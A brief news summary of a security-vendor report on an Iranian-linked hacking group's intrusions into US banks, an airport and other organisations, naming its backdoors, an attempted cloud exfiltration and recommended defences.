A technical analysis by Broadcom’s Symantec and Carbon Black Threat Hunter Tea said it found evidence of an Iranian-linked hacking group embedding itself in multiple U.S. corporate networks, including banks and airports, in activity detected in early March.
KEY FACTS
- Incident Intrusions into banks, an airport, a non-profit, and an Israeli software subsidiary
- Attribution MuddyWater, affiliated with Iran’s Ministry of Intelligence and Security
- Malware Dindoor backdoor using the Deno runtime and a Python backdoor called Fakeset
- Data exfiltration Attempt observed using Rclone to a Wasabi cloud storage bucket, success unknown
The campaign is assessed to have started in early February and activity continued after recent U.S. and Israeli military strikes on Iran. Targets included U.S. banks, an airport network, a Canadian non-profit, and an Israeli arm of a software supplier to defense and aerospace firms.
A previously unknown backdoor named Dindoor was observed. Dindoor executes code via the Deno JavaScript runtime and an attempt to move data using the Rclone utility to a Wasabi cloud bucket was recorded, though it is not known if data were exfiltrated.
On other hosts a Python backdoor called Fakeset was downloaded from Backblaze servers. The digital certificate that signed Fakeset has also been used to sign Stagecomp and Darkcomp malware that have been linked to the same actor.
Operators used credential theft and social engineering to gain access and maintained persistence with commodity tools and cloud utilities. Recommended steps for defenders include enforcing phishing resistant multi-factor authentication, applying network segmentation, disabling unnecessary internet exposure, and keeping internet-facing systems patched.
WHY IT MATTERS
The intrusions show state-linked actors are using widely available runtimes and cloud tools to persist in corporate environments and to attempt data theft. Organizations in affected sectors should harden access controls and increase monitoring for anomalous runtime and cloud activity.